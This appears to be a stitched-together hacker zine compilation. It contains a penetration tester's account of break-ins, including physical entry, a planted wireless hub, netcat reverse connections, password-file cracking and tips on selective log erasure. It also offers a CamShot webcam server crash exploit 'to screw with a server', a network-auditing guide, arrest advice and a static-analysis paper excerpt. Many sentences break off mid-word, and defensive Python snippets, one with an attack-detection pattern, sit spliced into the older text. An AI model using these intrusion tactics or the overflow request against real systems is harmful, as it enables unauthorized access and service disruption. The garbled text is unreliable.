The spelling of the message makes me wonder if I am dealing with an IT professional or a script kiddie here, but a quick look at the processes running on the machine (ps.exe from the NT Res Kit) shows me that he is connected via a PCAnywhere session, so it's probably a tech support guy, but he's not in front of the machine. So I write "God" in the Notepad message, give him about 5 seconds to read my reply, and then I kill his connection (kill.exe). Then I quickly erased the rest of my files on the machine, and killed my session while laughing hard with a colleague beside me.

Too bad that I missed that last vault, and that I was spotted, but if I weren't just a guy doing his job, working 9-5 because I also have a life, and under an artificial schedule, I would have cracked it, undetected. A dedicated corporate spy or malicious hacker would have done this at night, and would have remained completely undetected for as long as he wanted.

The second victim

Pseudonym : Trust-us e-commerce inc.
Type of company : e-commerce company, implements B2B and B2C solutions for businesses
Time allowed to hack : 3 man-days
Goal : penetrate the network as far as possible and get evidence of intrusion

So my first impression of a big corporate network from the security point of view (from my previous work experience at a telecommunications company, see "Virus protection in a Microsoft Windows network, or How to stand a chance") proved to be true with the successful and easy network intrusion I had done for XYZ Media Publishing Corporation. I was anxious to see how I would fare against an e-commerce company. I was curious to see if they really cared about security, given their area of expertise.

So the hack started pretty much the same way as the first one: DNS lookups, whois, port scan, etc. It turns out that there are about 5 or 6 machines reachable via the Internet: 2 *nix DNS servers, 1 Exchange mail server, and a couple of IIS machines.
These machines are all firewalled and only allow very specific traffic: http, https, DNS, SMTP. But remember that if one of these services is vulnerable, it can be exploited and the firewall won't be effective at blocking the attack. I run a whisker scan on the web servers to see if there are any known vulnerabilities in the web server itself, and in the CGI programs as well.

The machines turn out to be pretty secure, even if they are NT boxes. The server appears to be patched up to date, and unnecessary services have been removed from IIS (such as idq requests, asp pages, default sample pages). So I can't use the directory traversal vulnerability on this one. I try to mess with the CGI programs using some invalid requests, trying to see if I can provoke

We had received some new toys a couple of weeks before, and we couldn't wait to try them in the field. We had a wireless hub and a pair of PCMCIA wireless network cards. I don't know how much this equipment costs, but it shouldn't run above $2,000-3,000, probably less. Not exactly cheap, but not unaffordable to individuals. So we decided to attempt a physical intrusion into their offices, plant the wireless hub on their internal network, and see what happens next. There were three of us for this operation, but it could have been achieved by a single person.

We thought a bit about doing a masquerade and pretending that we were from the phone company or something, complete with uniforms and even a line tester that makes bip-bip sounds that are sure to convince any non-technical person unfamiliar with this kind of equipment. We even had the floor plan, which my boss requested from the facilities management guy (the people who manage building services). He gave the plans to my boss without asking for any ID or whatever; my boss simply told him that he was working for Trust-us e-commerce inc., and that was it!
My boss was even left alone in the facilities guy's office for about half an hour, enough time to give him the opportunity to take a peek or two, or steal one of the uniforms hanging by the door if he wanted to. But instead, we chose a simpler course: simply walk in dressed casually (average employee age at Trust-us is about 25-30) and pretend to belong there. The company is quite new, and they are hiring new staff, so it's quite normal for a place like this to see new faces.

So the plan was to have one person walk into the offices, avoiding the main entrance if possible, to stay clear of the receptionist's desk, and put the wireless hub on the network, on a free LAN jack in the photocopier room (as we could see from the floor plan), and to collect any valuable data the onsite visit could provide. In the meantime, another colleague would be sitting in a toilet stall with his laptop, equipped with the wireless network card, trying to get access to the network. If he proved successful, he would initiate a netcat connection from one of their machines to my laptop, and then leave the premises. As for me, I would be at our offices, hooked up to the ADSL link, waiting for the netcat connection to come to me. Once I g

And that's exactly what happened! My first colleague got in through the door beside the staircase, going inside with other people who were coming back from a cigarette break. He went to the photocopier room, plugged the wireless hub into the network, and hid it behind some boxes. After that, he walked across the offices, a lot of cubicles being empty, as the company had plans for growth. He said "Hi!" to a couple of people who were having a conversation. He found an employee list on a desk, with all the phone numbers and positions in the company. He went back to the photocopier room and made a copy. He also looked for other stuff, but it was hard to figure out what paper documents were about without looking suspicious.
So after half an hour, he simply took the hub back with him and left the premises.

Meanwhile, colleague #2 is in the bathroom stall with his laptop. He waits about 5 minutes to give #1 enough time to plant the bug. Then he boots up his machine and automatically gets an IP address from the internal network's DHCP server. That's a good start! It takes him no time to take control of an internal web server and launch the netcat connection to me (with full NT AUTHORITY/SYSTEM privileges, of course). While I put my scheduled jobs on this machine to keep a point of entry, he goes on an exploration tour of the rest of the network, stops at a couple of workstations to download some files, and leaves after 15 minutes, after making sure with me that everything was under control on my side (using a text file to send messages to each other).

As for me, I started doing the usual stuff: downloading the server's SAM file, cracking it, exploring the contents of some workstations, visiting the servers and the PDC/BDC and getting their SAMs as well. I downloaded some of their website source code, looked at test systems, the customer database, etc. I could see that there were firewalls between some of the internal network segments, but all NetBIOS ports were allowed, since these machines were all part of the same NT domain. I accidentally killed my session, but it came back to me exactly when I expected it, so I could continue without any problem.

At the end of the day, our mission was done. Again, there were three of us to implement this attack, but it could have been done by a single person. We only had one day left to perform the intrusion, so we had to be efficient and well prepared. But a single well-prepared person, having no schedule other than his own, could easily have walked into the offices, planted the hub on the network, gone into the bathroom, scheduled hk2 netcat sessions at specific times, and gone home to simply wait for the connections to initiate. Then he is free to do all he wants.
The autopsy of the two hacks

My goal with this paper is not to give a hacking cookbook to script kiddies so they can screw up big corporations real big instead of just defacing their websites. Neither is it to promote network intrusions. My goal is to give a reality check to the IT industry, and to the companies that employ its people, about the state of network security: to show how easy an intrusion is, and the impact a security incident like this could have on a business. With all the information that is available, a malicious person is limited only by his imagination (BTW, blackmailing is very unimaginative).

My goal with this paper is also to outline why these hacks succeeded so easily, in order to understand why this could happen in the first place. Only then will we be able to define corrective actions. So it is in this chapter that we will perform the autopsy of these hacks, and find out what problems these companies, and many others, are facing.

In the case of XYZ Media Publishing Corporation, the problems are numerous, and do not simply involve technology. First of all, I made a lot of mistakes when I hacked this machine (the web server), learning curve and all... For example, I did not erase the evidence of my intrusion from the IIS log files. A kiddie would probably have thought to erase the whole file, but an experienced intruder would have deleted only the entries belonging to him, to leave as little trace as possible. Not that it mattered in this case, because nobody looked at the log files. They only checked when they received my report, and they were astonished at how much noise I had made that went undetected. Worse than that, there were 2 antivirus pop-ups (hk.exe) showing on the server's screen for 2 days without anybody noticing them, or actually they saw them, but didn't bother to care! But wait, there's more: the tech who spotted us while we were in a Winvnc session didn't even bother to report the incident to anybody!
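
The noise that nobody looked at could have been spotted with very little effort. Here is a minimal sketch, assuming a plain-text web server log with one request per line; the sample log lines and the pattern list are made up for illustration and are nowhere near a complete signature set. It flags requests containing parent-directory sequences, a reference to cmd.exe, or suspicious percent-encodings.

```python
import re

# Illustrative indicators only: parent-directory sequences, cmd.exe,
# two-byte encodings starting with %c0 or %c1, and double-encoded "%".
SUSPICIOUS = re.compile(
    r"\.\.[/\\]|cmd\.exe|%c[01]%[0-9a-f]{2}|%25",
    re.IGNORECASE,
)

# Made-up sample in a W3C-style layout; addresses are documentation ranges.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem sc-status",
    "2001-08-14 10:02:11 192.0.2.10 GET /index.html 200",
    "2001-08-14 10:02:15 192.0.2.77 GET /..%1c%pc../winnt/system32/cmd.exe 200",
    "2001-08-14 10:03:40 192.0.2.10 GET /images/logo.gif 200",
]


def flag_suspicious(lines):
    """Return (line_number, line) pairs for requests matching SUSPICIOUS."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if line.startswith("#"):  # skip header/directive lines
            continue
        if SUSPICIOUS.search(line):
            hits.append((number, line.rstrip("\n")))
    return hits


if __name__ == "__main__":
    for number, line in flag_suspicious(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Run daily from a scheduled job against the real log files, even something this crude would have raised a flag long before the report arrived.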
With

Another problem is the lack of experience of their IT staff. It is well known that these big corporations, in order to be cost-efficient (i.e. as cheap as possible, to keep shareholders happy), centralize their support to reduce costs, and in doing so hire those who cost less, who happen to be the least experienced on the market. I took a good look at the resumes of their staff, and they tend to confirm my theory. Most of them didn't even have a college degree, even less a university degree. They had a computer support course and an MCSE from a specialized school; in a word, they were green. These people know only as much as they have been shown, and will click where they learned to click, without any understanding of the concepts or implications of what they have just done. This is a direct effect of the big boom in the IT industry during the 90's. Demand was too high compared to supply, so the industry had to generate more workforce, and doing so rushed out of schools diplomed computer i

This leads to the third problem, directly generated by the preceding one, which is the presence of unpatched, highly vulnerable servers on the Internet. And their problem is about 40-fold, since XYZ Media Publishing Corporation is really about 40 smaller companies, all owned by XYZ Media Publishing Corporation, and each of these companies has the same problem, and all require urgent security measures. $$$

The fourth problem, in the same vein, is a really bad network architecture. XYZ Media Publishing Corporation cared enough about its network to at least put firewalls at each Internet entry point. All serious firewall products include the possibility of having a DMZ, which is a separate part of your network designed to hold the publicly accessible machines, like a web server or a mail server. The idea is to keep these machines separated from the rest of your internal network.
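
The DMZ idea can be written down as a small zone policy. The sketch below is only an illustration: the address ranges are placeholders and the rule set is an assumption, not any real firewall's configuration language. It allows the Internet and the internal network to reach the DMZ, allows the internal network out to the Internet, and denies everything else by default, including any connection that a DMZ machine tries to initiate.

```python
from ipaddress import ip_address, ip_network

# Placeholder ranges for illustration; a real network will differ.
ZONES = {
    "dmz": ip_network("192.0.2.0/24"),
    "internal": ip_network("10.0.0.0/8"),
}

# (source zone, destination zone) pairs that may open a connection.
# Anything not listed here is denied.
ALLOWED = {
    ("internet", "dmz"),
    ("internal", "dmz"),
    ("internal", "internet"),
}


def zone_of(address):
    """Return the zone name for an address, or 'internet' if none matches."""
    ip = ip_address(address)
    for name, network in ZONES.items():
        if ip in network:
            return name
    return "internet"


def is_allowed(source, destination):
    """Default-deny check on who may initiate a connection to whom."""
    return (zone_of(source), zone_of(destination)) in ALLOWED


if __name__ == "__main__":
    print(is_allowed("203.0.113.5", "192.0.2.10"))  # Internet -> web server
    print(is_allowed("192.0.2.10", "10.1.2.3"))     # web server -> internal
    print(is_allowed("192.0.2.10", "203.0.113.5"))  # web server -> Internet
```

Note the last case. Under this policy a DMZ machine cannot open connections outward either, which is exactly the kind of traffic the FTP download and the netcat sessions in the first intrusion depended on.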
Since these servers are exposed to the Internet, that means that anyone can potentially compromise them. The role of the firewall is to deny all access from the DMZ machines to the internal network, because these machines cannot be trusted, and a connection initiated from one of them means that the machine has most probably been cracked. That way, you protect your internal network from Internet exposure, keep your public servers, and make sure that the servers can't be used to access the internal network. In the case of

The fifth problem afflicted both companies, and is widespread in the networked corporate world: the internal network, and especially the workstations, are completely unprotected. Many of the PCs have open shares, not even protected by a password (which could be broken anyway, especially on a Win 9x machine). Passwords are weak and easily broken. ACLs are rarely implemented on NT workstations; on servers they are implemented on the data portion (to prevent people from accessing other people's files), but not on the system portion, which means that anyone can grab the password file and crack it later. Antivirus products are often out of date, even though auto-update features are now common, and even when they are up to date, they can be easily circumvented. Let's just say that if your only protection is an antivirus product, then you shouldn't even bother to install it.

The sixth problem is the one that caught Trust-us e-commerce inc. with its pants down. Being an e-commerce company, they were serious enough about security to take good care of their systems. The ones exposed to the Internet, that is. So besides having their internal systems completely open, like XYZ Media Publishing Corporation, their physical security was nonexistent. Beginning with the guy who manages the building, who gave us the floor plans! He even offered to give us the plans of other floors.
Then, it was easy to go inside the offices without being challenged by anyone; a challenge would have forced the intruder to think quickly and bullshit his way out, with the chance that he makes a mistake and gives himself away. The floor had many access doors besides the main entrance, which was guarded by the secretary. There's no badge or ID or anything to differentiate an employee from an outsider. That was their weak spot. Ironically, I would say that XYZ Media Publishing Corporation was better protected in terms of physical security, but it could still be

Then, there is the lack of security awareness among corporations' upper management. The finance director of XYZ Media Publishing Corporation was all shocked to see the results of my intrusion attempt, as he firmly believed that their network was secure. Then, in true beancounter style, he complained about the amount of money they had paid for the firewalls, which proved to be useless after all. But this guy only understands dollars, not technology. Is it possible to achieve a secure computing environment connected to the Internet without firewalls? Absolutely not, of course! But are they sufficient to secure the computing environment all by themselves? The answer is no again. But he thought that simply buying an expensive band-aid would solve all their security problems.

Which leads me to the last problem I can identify in this autopsy. Pretty much like the IT industry growth of the 90's and the Y2K rush that later mutated into e-commerce, the computer security industry is also falling victim to a "gold rush effect". Given the enormous size of the vulnerable computing base in corporate IT, it is not hard to see a high revenue potential for any skilled businessman. It is not rare, then, to see small professional security firms being purchased and merged into bigger IT companies that were mostly in the MCSE business before that (what a surprise).
Instead of seeing the knowledge of the security firm applied to the MCSE shop's procedures, in order to increase the value of the services they provide and thus do better than the competition (which should increase your market share and revenues), they want to keep the security department from bashing Microsoft too much, because Microsoft is a business partner, and it isn't a good thing to bitch about a partner, because it might piss him off. Also, the MCSEs didn't appear t

Conclusion

The cases I have covered here are real-life cases; nothing has been added for dramatic effect. I know that not all networks are this vulnerable, but let's be serious, secured networks are the exception, not the norm. The norm is what is described in this paper. This is even worse than a worm that walks from web server to web server (although Code Red II made it interesting by backdooring the servers it infected, making it even easier to hack the machines than what is shown in this paper) or an e-mail virus that sends files out. Those problems are also serious enough to take care of, but they are only the tip of the iceberg.

Now, with all the disinformation going on, and attempts by companies to shut down free speech concerning computer security research and related topics, up to the point of arresting a Russian programmer this summer for writing a "circumvention device", and all the other abuses of the DMCA, I wonder what will happen to me and this paper. Will I be arrested for showing how to "circumvent a security mechanism" by fooling the antivirus? This may seem like a dumb and ridiculous joke aimed at the spooks out there, but to tell you frankly, I see hackers as the target of the new witch hunt of the 2000's. It is sad, because they are the very same people who built this wonderful network that is the Internet, and they are the people who can contribute most to securing it, by doing research and sharing information.
But the thing is, and it should be obvious to the reader by now, that the systems out there are massively and highly insecure, and stopping people from talking about these issues, and keeping the public in ignorance by putting fear into them, fueled by mass-media hysteria, is not gonna help. In order to solve these issues, priorities will have to be set, and those who choose the right priorities are probably those who are gonna win in the long run. In the meantime, anything can happen.

Appendix A. Resources

BUGTRAQ
www.securityfocus.com
Big security site and host of the Bugtraq mailing list

Britney's NT hack guide
http://www.interphaze.org/bits/britneysnthackguide.html
Guide to hacking NT and IIS

Rain Forest Puppy
http://www.wiretrip.net/rfp/2/index.asp
Home page of Rain Forest Puppy, discoverer of the Unicode directory traversal vulnerability, and author of Whisker

Astalavista
http://astalavista.box.sk/
Search engine for security related websites, tools and articles

Google
www.google.com
Web search engine, useful to look for hard-to-find stuff like hk.exe

===[ Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP ]===
--- by Lucid ---

Intro

So I'm sure you might have seen this little trick... but if you haven't, it's a rather funny way to screw with a server running CamShot WebCam HTTP Server v2.5. As always, this is for your information only, hacking is bad, it makes me cry... I'm starting to cry thinking about it now... see what you've done??!

Affects

As far as I know, it affects Win9x for sure; I have yet to find an NT, ME, or 2000 box running it.

The Code

[lucid@localhost]$ telnet www.test.com 80
Trying test.com...
Connected to www.test.com
Escape character is '^]'.
GET (buffer) HTTP/1.1
(enter)
(enter)

Where (buffer) is about 2000 characters. Requesting this causes the server to overflow itself and, in time, crashes the software (once or twice on my test machine it killed the system as well).
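
For anyone writing their own little HTTP server, the missing piece here is a length check on the request line before anything else touches it. The sketch below shows only that logic. It is in Python, which cannot overflow a buffer the way a native Win9x program can, and the 1024-byte limit and the function name are assumptions chosen for illustration, not anything taken from CamShot.

```python
# Assumed limit for illustration; pick whatever your server actually needs.
MAX_REQUEST_LINE = 1024


def check_request_line(raw, limit=MAX_REQUEST_LINE):
    """Return an HTTP status code for the first line of a raw request.

    414 = request line too long, 400 = malformed, 200 = looks acceptable.
    """
    # Take everything up to the first CRLF as the request line.
    line = raw.split(b"\r\n", 1)[0]
    # Reject over-long lines before any parsing or copying happens.
    if len(line) > limit:
        return 414
    # A request line is "METHOD SP request-target SP HTTP-version".
    if len(line.split(b" ")) != 3:
        return 400
    return 200


if __name__ == "__main__":
    normal = b"GET /index.html HTTP/1.1\r\n\r\n"
    oversized = b"GET /" + b"a" * 2000 + b" HTTP/1.1\r\n\r\n"
    print(check_request_line(normal))
    print(check_request_line(oversized))
```

In a native server the same rule applies when reading from the socket: never copy more bytes into a fixed buffer than the buffer can hold.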
What They See

CAMSHOT caused an invalid page fault in module at 0000:61616161.
Registers:
EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246
EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058
ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff
EDX=bff76855 ES=0187 EDI=005a0104 GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8

Closing
Yes, it's a lame little exploit, but it's funny nonetheless. Again, only use this on yourself; you wouldn't wanna make me cry again.

http://www.Phreak2000.com

============[ An Approach to Systematic Network Auditing ]==============
--- by Mixer ---

In the past few years, people have learned that a well-designed network installation done by administrators with average knowledge of security can still very often be compromised, due to the large number of attack possibilities and discovered vulnerabilities an intruder has at his disposal nowadays. This is why security auditing and penetration testing have recently become popular with big companies, security-aware individuals and of course the security industry. Network auditing, or penetration testing, can be seen as a systematic attempt to gain access to a network by discovering all points of access to it, and then analyzing those points for any known vulnerabilities which a real intruder could use to gain further access. However, many companies perform this kind of analysis in a manner that is not sufficient or systematic enough to spot all possible vulnerabilities. So, here is one possible approach, in a nutshell, that I would take to secure a network systematically.

Starting off with a secure network

The main prerequisite for having a secure network is to start off with installations on which you can be sure that no security intrusion has previously happened.
Imagine a big company rigorously securing their resources, only to find they had been compromised a year before, and the attacker had changed the system kernel so he doesn't need any vulnerable program at all to gain access anymore. There doesn't even have to be a permanently open tcp or udp port; if the intruder is clever, he has reprogrammed the system to watch for raw data containing a secret activation code, and then give backdoor access for a very short period of time, which cannot be detected unless one knows the correct code. Take a look at the Q [1] remote shell, if you need an example.

So, first of all, (re-)install your operating systems, making sure that there are no binary executables left from old installations. Importing other kinds of data from other systems generally creates no security risk. If you are open-minded enough to take advice on what OS to use, then let me suggest anything except Windows NT. Systems like HPUX/AIX/IRIX are no good, either, because they are not open source. The problem is that you CANNOT trust systems that come without their source code to be secure at all. The vulnerabilities which exist in the software and kernel of commercial non-open-source systems are not worse than those in other systems, but they EXIST, and it is very hard for the security community to identify them, and it takes a lot more time. For example, SunOS / Solaris was always said to be very secure, until recently its creators decided to make the source code public (which was a good idea in the long run). Quickly, a large number of vulnerabilities that couldn't be detected before were found in Solaris, and some people still consider it to be extraordinarily secure... this was the right step towards becoming a secure operating system, but it will surely take a long time until virtually all vulnerabilities have been spotted. If you want a secure operating system, install a BSD derivative, such as OpenBSD.
You can also use Solaris, or Linux if you have sufficient knowledge of securing it. The most problematic thing is that it has become very easy to install even a complex UNIX system, and that many people only do enough to get it up and running. You should get a system that is at least one year old, to make sure that most of the vulnerabilities present in the system have already been spotted. This is important: people who always install the newest version of their systems, one day after it comes out, put their security at greater risk than people who run outdated but well-patched systems.

Secondly, go to your vendor's web site and find out which software packages you should update. For security purposes, it is only important to update packages that are suid root or always run as root, and servers that you generally need and run. Next, disable any servers that run by default and that you don't explicitly require on your network! Browse through your files, looking for suid binaries:

find / \( -perm -4000 -o -perm -2000 ! -type d \) -exec ls -ldb {} \;

Remove the suid flag (chmod 755 each binary) on any of the programs that don't need to be run with root privileges by non-root users or scripts. Now you need to examine your system and server configuration, most of which is in the /etc directory. Get to know your operating system's security mechanisms, and also recompile your kernel. You should have basic knowledge of every server / daemon process that you run on your machines, and check the configuration for it. Once you have done all this, you can consider your system to have basic stability and security. Also consider doing this on one system and copying your partitions to other systems to save yourself some work.

One more recommended thing is to block ICMP at your border router(s), to be safe from ICMP 'firewalking' and generic denial of service.
To prevent 'smurf' and other flood attacks, specifically make sure your broadcast addresses (IPs ending in .0 and .255) do not reply to ICMP, and (if you use IOS or something similar) make your routers detect 'flood' attacks and go into high-bandwidth or alternative-route modes if they see a certain number of packets in a specified amount of time. Connection-oriented routing can also be very useful. Finally, deny all other known and unknown IP protocols besides TCP, UDP and ICMP, in case you don't need them.

Creating reliable audit trails

One simple precaution that everyone should take is to make sure that audit trails (in other words: logs) are present, and that one instance of them cannot be altered. Compile a list of servers that you don't (!) and never will run on any of the machines on your network, and instruct the border routers that connect you with the rest of the world to deny and log all incoming requests to those ports. Don't block port 20 unless you want to break active ftp transfers, and don't block ports above 1024 (non-privileged). You should have some form of remote logging available that each of your hosts uses. The easiest way is to configure syslog (see the syslog.conf manpage) to log all messages to a remote loghost. A loghost is a dedicated, secured machine that runs only syslog and sshd (or not even sshd, so it is accessible only physically via console) and has enough disk space for all the logs. A good idea would also be a solution with digitally signed and/or encrypted logs to prevent manipulation and to ensure authenticity.

Once you have done this, you can implement extra Intrusion Detection and firewalling services. This is recommended as an extra security mechanism, but not required if you have really secured your machines well, and it is a bit too much to cover in one article.
Only this much: If you implement a firewall/IDS, then first perform step 3, install the firewall with a good rule set, and perform step 3 again to audit your firewall rules and your IDS stability and logging capabilities.

Penetration testing I: gathering information

Now, let us find every available service. If this step is performed before implementing a firewall, it should be performed from within the local network, to be as reliable as possible; otherwise, from behind the network border. You should use nmap [4] for port scanning, which is currently the most reliable and comprehensive port scanner available. Scan tcp port range 1 to 65535 and udp port range 1 to 65535 on every host, and save the results (open ports). This would look like, for example:

nmap -sT -P0 -p1-65535 -I -n 10.0.0.0/24 >> results.txt
nmap -sU -P0 -p1-65535 -I -n 10.0.0.0/24 >> results.txt

(This would scan hosts 10.0.0.0 to 10.0.0.255.)

Note: to audit firewall rules or IDS logging capabilities, re-run this scan with values like: -f, -sS / -sF / -sN and -g 20 / 53 / 80
The results should NOT show more than the normal scans, and any IDS you have installed should detect and log the stealth scanning tricks.

Penetration testing II: evaluating information

Generally, the causes of remote network security problems can be classified into five groups:

I. Problems due to buffer overflows (ex.: exploitable imap server)
II. Problems due to generally insecure programs (ex.: insecure CGI scripts)
III. Problems due to insecure configuration (ex.: default samba shares)
IV. Problems due to lack of or insecure passwords (ex.: SNMP daemon)
V. Backdoors and trojan horses (not applicable if you went through step 1.)

Many people see a penetration check as an attempt to exploit any of these problems, if present, to gain access to (hack into) a host and thereby prove that it is insecure. This is not sufficient to ensure security in a systematic way, however, because one would miss the potential holes.
One way to start off is to use a well-designed and reliable security scanner, like NSAT [5]. I don't only recommend it for self-promotion ;), but because it scans for a lot of vulnerabilities and does not only report them, but also a lot of information, versions, auditing results etc., from which one can draw one's own conclusions. In contrast to many other scanners, this enables NSAT to audit services at all times with maximum efficiency, while it doesn't need to maintain a very recent vulnerabilities database. Give NSAT a try and audit the services it scans for with it. However, if you run other uncommon services that NSAT does not scan for, or you want to be 100% safe, you should afterwards scan and examine them manually as well, using telnet, netcat, browser, etc. sessions. To actually identify all vulnerabilities (you may have guessed it, this is the hardest part :)!), search archives of security mailing lists [8], security sites [9], and vendor sites for known security issues regarding the server, and also don't be afraid to write to the author to ask if your version is vulnerable. If you find no exploits or advisories regarding your program at all, you can consider it to be secure. The better way is, of course, to look for updates for every server you run and install the latest versions. Refrain from running anything if you don't fully understand how to configure and maintain it. In most cases, understanding a program up to the point where you know how to properly secure it doesn't take too much work, as most GNU programs are generally well-documented and user friendly once you get to know them.

There are a few cases where you cannot audit services satisfactorily by looking at the version or performing sample sessions, namely httpd, where you have to locally examine the CGI scripts. You can use very sophisticated and flexible CGI scanners to locate vulnerable CGIs, but you can never be sure to find them all by doing a remote scan.
You need to locally scan your cgi-bin/ directory and scripts that may reside somewhere else in your document root. Self-written or uncommon CGI scripts are a big security risk; an intruder WILL scan for and find those, if he tries hard enough. Always consider every executable script on your HTTP server as relevant to security as a separate server running with the privileges of your httpd.

Another important subject is services with password authentication. If possible, disable non-encrypted services and use kerberos-enabled mail servers, and ssh / sftp instead. It is crucial to your security to have all authentication mechanisms use strong, non-standard passwords that cannot be easily brute forced. Configuring your standard authentication not to accept weak passwords at all is a good idea. If you are securing multi-user systems, you should always make secure passwords a central point in your security policy. (But designing an adequate security policy is another big, important topic besides network security.) BSD style MD5 and all DES passwords can and should be tested with John [6]; other issues with passwords exist in snmp, http auth, linuxconf, r-services, SQL and various other services.

A small collection of related articles and programs

[1] Q - stealth encrypted remote shell and redirection server
http://members.tripod.com/mixtersecurity/Q-0.9.tgz
[2] Brian Martin: Why your network is still vulnerable
http://www.hackernews.com/orig/whyvuln.html
[3] David Curry: Improving your network by breaking into it
http://www.rootshell.com/beta/docs/improving_security_sri.ps.gz
[4] Nmap by fyodor
http://www.insecure.org/nmap
[5] Network security analysis tool
http://members.tripod.com/mixtersecurity/nsat-1.09.tgz
[6] John the ripper by Solar Designer
http://www.false.com/security
[7] Daniel V.
Klein: Foiling the Cracker http://www.rootshell.com/beta/docs/passwords_klein.ps.gz [8] Security Focus / Bugtraq Mailing List archives http://www.securityfocus.com [9] Packet Storm Security http://packetstorm.securify.com Mixter mixter@newyorkoffice.com http://members.tripod.com/mixtersecurity ==================[ Ten Things NOT to do if Arrested ]================== --- by Brian Dinday --- I have been practicing criminal law for 24 years and have seen a wide variety of reactions by people who are being arrested. Some of these reactions are unwise but understandable. Others are self defeating to the point of being bizarre. No one plans to be arrested, but it might help to think just once about what you will do and not do if you ever hear the phrase "Put your hands behind you." The simplest "to do" rule is to do what you are told. Simple, but somehow it often escapes someone who is either scared or intoxicated. More important to guarding your rights and interests are ten things you SHOULD NOT do: 1. Don’t try to convince the officer of your innocence. It’s useless. He or she only needs "probable cause" to believe you have committed a crime in order to arrest you. He does not decide your guilt and he actually doesn’t care if you are innocent or not. It is the job of the judge or jury to free you if he is wrong. If you feel that urge to convince him he’s made a mistake, remember the overwhelming probability that instead you will say at least one thing that will hurt your case, perhaps even fatally. It is smarter to save your defense for your lawyer. 2. Don’t run. It’s highly unlikely a suspect could outrun ten radio cars converging on a block in mere seconds. I saw a case where a passenger being driven home by a drunk friend bolted and ran. Why? It was the driver they wanted, and she needlessly risked injury in a forceful arrest. Even worse, the police might have suspected she ran because she had a gun, perhaps making them too quick to draw their own firearms. 
Most police will just arrest a runner, but there are some who will be mad they had to work so hard and injure the suspect unnecessarily. 3. Keep quiet. My hardest cases to defend are those where the suspect got very talkative. Incredibly, many will start babbling without the police having asked a single question. My most vivid memory of this problem was the armed robbery suspect who blurted to police: "How could the guy identify me? The robbers was wearing masks." To which the police smiled and responded, "Oh? Were they?" Judges and juries will discount or ignore what a suspect says that helps him, but give great weight to anything that seems to hurt him. In 24 years of criminal practice, I could count on one hand the number of times a suspect was released because of what he told the police after they arrested him. 4. Don’t give permission to search anywhere. If they ask, it probably means they don’t believe they have the right to search and need your consent. If you are ordered to hand over your keys, state loudly "You do NOT have my permission to search." If bystanders hear you, whatever they find may be excluded from evidence later. This is also a good reason not to talk, even if it seems all is lost when they find something incriminating. 5. If the police are searching your car or home, don’t look at the places you wish they wouldn’t search. Don’t react to the search at all, and especially not to questions like "Who does this belong to?" 6. Don’t resist arrest. Above all, do not push the police or try to swat their hands away. That would be assaulting an officer and any slight injury to them will turn your minor misdemeanor arrest into a felony. A petty shoplifter can wind up going to state prison that way. Resisting arrest (such as pulling away) is merely a misdemeanor and often the police do not even charge that offense. Obviously, striking an officer can result in serious injury to you as well. 7. 
Try to resist the temptation to mouth off at the police, even if you have been wrongly arrested. Police have a lot of discretion in what charges are brought. They can change a misdemeanor to a felony, add charges, or even take the trouble to talk directly to the prosecutor and urge him to go hard on you. On the other hand, I have seen a client who was friendly to the police and talked sports and such on the way to the station. They gave him a break. Notice he did not talk about his case, however. 8. Do not believe what the police tell you in order to get you to talk. The law permits them to lie to a suspect in order to get him to make admissions. For example, they will separate two friends who have been arrested and tell the first one that the second one squealed on him. The first one then squeals on the second, though in truth the second one never said anything. An even more common example is telling a suspect that if he talks to the police, "it will go easier". Well, that’s sort of true. It will be much easier for the police to prove their case. I can’t remember too many cases where the prosecutor gave the defendant an easier deal because he waived his right to silence and confessed. 9. If at home, do not invite the police inside, nor should you "step outside". If the police believe you have committed a felony, they usually need an arrest warrant to go into your home to arrest you. If they ask you to "step outside", you will have solved that problem for them. The correct responses are: "I am comfortable talking right here.", "No, you may not come in.", or "Do you have a warrant to enter or to arrest me in my home?" I am not suggesting that you run. In fact, that is the best way to ensure the harshest punishment later on. But you may not find it so convenient to be arrested Friday night when all the courts and law offices are closed. 
With an attorney, you can perhaps surrender after bail arrangements are made and spend NO time in custody while your case is pending. 10. If you are arrested outside your home, do not accept any offers to let you go inside to get dressed, change, get a jacket, call your wife, or any other reason. The police will of course escort you inside and then search everywhere they please, again without a warrant. Likewise decline offers to secure your car safely. That’s it: Ten simple rules that will leave as many of your rights intact as possible if you are arrested. How about a short test? You have a fight with your live-in girlfriend and the police come and find you on the sidewalk two houses down from the apartment. The girlfriend points you out and the police arrest you for assault. They tell you they don’t intend to question you. They just want your name and address. Do you answer? Well, you shouldn’t. Your address is the single most damaging admission you could make. If you admit living with her, you have just converted a misdemeanor assault into a felony punishable by state prison. When you are arrested it is their game, and you don’t know the rules. It is best to be silent and let the attorney handle it later. The bottom line is that if the police have enough evidence to arrest, they will. If they don’t have that evidence, you could easily provide it by talking. =====[ Statically Detecting Likely Buffer Overflow Vulnerabilities ]===== --- by David Larochelle and David Evans --- Abstract Buffer overflow attacks may be today’s single most important security threat. This paper presents a new approach to mitigating buffer overflow vulnerabilities by detecting likely vulnerabilities through an analysis of the program source code. Our approach exploits information provided in semantic comments and uses lightweight and efficient static analyses. This paper describes an implementation of our approach that extends the LCLint annotation-assisted static checking tool. 
Our tool is as fast as a compiler and nearly as easy to use. We present experience using our approach to detect buffer overflow vulnerabilities in two security-sensitive programs.

Introduction

Buffer overflow attacks are an important and persistent security problem. Buffer overflows account for approximately half of all security vulnerabilities [CWPBW00, WFBA00]. Richard Pethia of CERT identified buffer overflow attacks as the single most important security problem at a recent software engineering conference [Pethia00]; Brian Snow of the NSA predicted that buffer overflow attacks would still be a problem in twenty years [Snow99].

Programs written in C are particularly susceptible to buffer overflow attacks. Space and performance were more important design considerations for C than safety. Hence, C allows direct pointer manipulations without any bounds checking. The standard C library includes many functions that are unsafe if they are not used carefully. Nevertheless, many security-critical programs are written in C.

